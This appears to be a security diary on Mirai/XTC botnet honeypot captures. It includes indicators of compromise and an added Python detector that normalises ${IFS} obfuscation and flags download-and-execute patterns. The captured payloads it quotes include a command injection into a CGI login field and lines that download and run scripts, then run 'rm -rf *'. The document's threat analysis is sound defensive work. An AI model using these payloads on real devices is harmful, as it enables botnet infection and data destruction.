Mirai Botnet Activity

Published: 2020-06-13
Last Updated: 2020-06-13 18:35:15 UTC
by Guy Bruneau (Version: 1)

This past week, I noticed new activity from the Mirai botnet in my honeypot. The IP and file associated with the first log sample, which appeared multiple times this week including today, appear to have been taken down. However, the last two logs from today are still active; they use a Bash script to download multiple exploits targeting various device types (MIPS, ARM4-7, MPSL, x86, PPC, M68k). Something else of interest is the User-Agent "XTC" and the name "viktor", which appear to be linked to the XTC IRC botnet, aka Hoaxcalls.

  • 20200613-025717: data 'POST /cgi-bin/mainfunction.cgi HTTP/1.1\r\nUser-Agent: XTC\r\nHost:\r\nContent-Length: 189\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\n\r\naction=login&keyPath='wget${IFS}${IFS}-O${IFS}/tmp/viktor;${IFS}chmod${IFS}777${IFS}/tmp/viktor;${IFS}/tmp/viktor'&loginUser=a&loginPwd=a\r\n\r\n'
  • 20200613-101614: data 'cd /tmp; wget; chmod 777 8UsA.sh; sh 8UsA.sh; rm -rf *\r\n\r\n'
  • 20200613-101617: data 'cd /tmp; wget; chmod 777 8UsA.sh; sh 8UsA.sh; rm -rf *\r\n\r\n'
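The three entries above share a recognisable shape: the first one hides a shell command inside a login parameter by using `${IFS}` in place of spaces, and all of them stage a payload in `/tmp`, make it executable with `chmod 777`, and run it. The script below is an added example (it is not part of the diary and not a tool the author used) that normalises the `${IFS}` trick back to plain spaces and scores each honeypot line against those indicators. It assumes the honeypot's `timestamp: data '...'` line format shown above; the first three sample lines are copied from the diary (with the IPs already stripped there), and the fourth benign request is constructed for contrast.

```python
import re

# Sample input: three lines copied from the diary above plus one constructed
# benign request. The honeypot writes CRLF as the literal characters "\r\n".
SAMPLE_LOG = [
    r"20200613-025717: data 'POST /cgi-bin/mainfunction.cgi HTTP/1.1\r\nUser-Agent: XTC\r\nHost:\r\nContent-Length: 189\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\n\r\naction=login&keyPath='wget${IFS}${IFS}-O${IFS}/tmp/viktor;${IFS}chmod${IFS}777${IFS}/tmp/viktor;${IFS}/tmp/viktor'&loginUser=a&loginPwd=a\r\n\r\n'",
    r"20200613-101614: data 'cd /tmp; wget; chmod 777 8UsA.sh; sh 8UsA.sh; rm -rf *\r\n\r\n'",
    r"20200613-101617: data 'cd /tmp; wget; chmod 777 8UsA.sh; sh 8UsA.sh; rm -rf *\r\n\r\n'",
    # Constructed benign line: an ordinary GET with a browser User-Agent.
    r"20200613-110000: data 'GET /index.html HTTP/1.1\r\nUser-Agent: Mozilla/5.0\r\nHost: example.invalid\r\n\r\n'",
]

LINE_RE = re.compile(r"^(\d{8}-\d{6}): data '(.*)'$")
IFS_RE = re.compile(r"\$\{IFS\}|\$IFS\b")

# Indicators evaluated on the normalised payload (IFS expanded, CRLF restored).
NORMALIZED_INDICATORS = {
    "xtc_user_agent": re.compile(r"^User-Agent: XTC\s*$", re.MULTILINE),
    "downloader": re.compile(r"\b(?:wget|curl|tftp)\b"),
    "world_writable_chmod": re.compile(r"\bchmod (?:777|\+x) "),
    "tmp_staging": re.compile(r"(?:\bcd |-O )/tmp\b"),
    "exec_from_tmp": re.compile(r"(?:\bsh [\w.]+|; ?/tmp/[\w.]+)"),
    "cleanup": re.compile(r"\brm -rf \*"),
}


def normalize(payload: str) -> str:
    """Collapse the ${IFS} word-splitting trick back to spaces and turn the
    honeypot's escaped CRLF markers into newlines so header regexes match."""
    text = IFS_RE.sub(" ", payload)
    text = text.replace("\\r\\n", "\n")
    return re.sub(r"[ \t]+", " ", text)


def analyze_line(line: str) -> dict:
    """Return the timestamp, the matched indicators and a verdict for one line."""
    m = LINE_RE.match(line.rstrip("\n"))
    if not m:
        return {"timestamp": None, "indicators": [], "suspicious": False}
    timestamp, payload = m.groups()
    hits = set()
    # The obfuscation itself is an indicator; check it on the raw payload.
    if IFS_RE.search(payload):
        hits.add("ifs_obfuscation")
    norm = normalize(payload)
    for name, rx in NORMALIZED_INDICATORS.items():
        if rx.search(norm):
            hits.add(name)
    # Verdict: obfuscated shell or the XTC agent alone is enough; otherwise
    # require a download paired with a chmod or an execution step.
    suspicious = bool(hits & {"ifs_obfuscation", "xtc_user_agent"}) or (
        "downloader" in hits and bool(hits & {"world_writable_chmod", "exec_from_tmp"})
    )
    return {"timestamp": timestamp, "indicators": sorted(hits), "suspicious": suspicious}


def scan_log(lines) -> list:
    """Return the analysis of every line judged suspicious, in log order."""
    return [r for r in (analyze_line(l) for l in lines) if r["suspicious"]]


if __name__ == "__main__":
    for result in scan_log(SAMPLE_LOG):
        print(result["timestamp"], ", ".join(result["indicators"]))
```

Expanding `${IFS}` before matching is the important step: a rule written for `chmod 777` never fires on `chmod${IFS}777`, so the normalisation step is what makes the first request look like the other two.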

Indicators of Compromise

  • http://96.30.193[.]26/arm7
  • http://185.172.111[.]214/8UsA[.]sh
  • User-Agent: XTC

Suspicious Files and Scripts:

  • UnHAnaAW.sh4 - 5d646c4f5d1793a6070bb03b069f263529b4bc470ab4d5960ae55a211eb9b2f1
  • 8UsA.sh - 590d00e051703e55be2ad10fa94eadc499262bf8a62190a648a7a2756fd31862

[1] https://www.virustotal.com/gui/file/5d646c4f5d1793a6070bb03b069f263529b4bc470ab4d5960ae55a211eb9b2f1/detection
[2] https://security.radware.com/ddos-threats-attacks/threat-advisories-attack-reports/hoaxcalls-evolution/
[3] https://blog.radware.com/security/botnets/2020/05/whos-viktor-tracking-down-the-xtc-polaris-botnets/
[4] https://isc.sans.edu/ipinfo.html?ip=
[5] https://isc.sans.edu/ipinfo.html?ip=
[6] https://isc.sans.edu/ipinfo.html?ip=
[7] https://isc.sans.edu/ipinfo.html?ip=

Guy Bruneau IPSS Inc.
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu
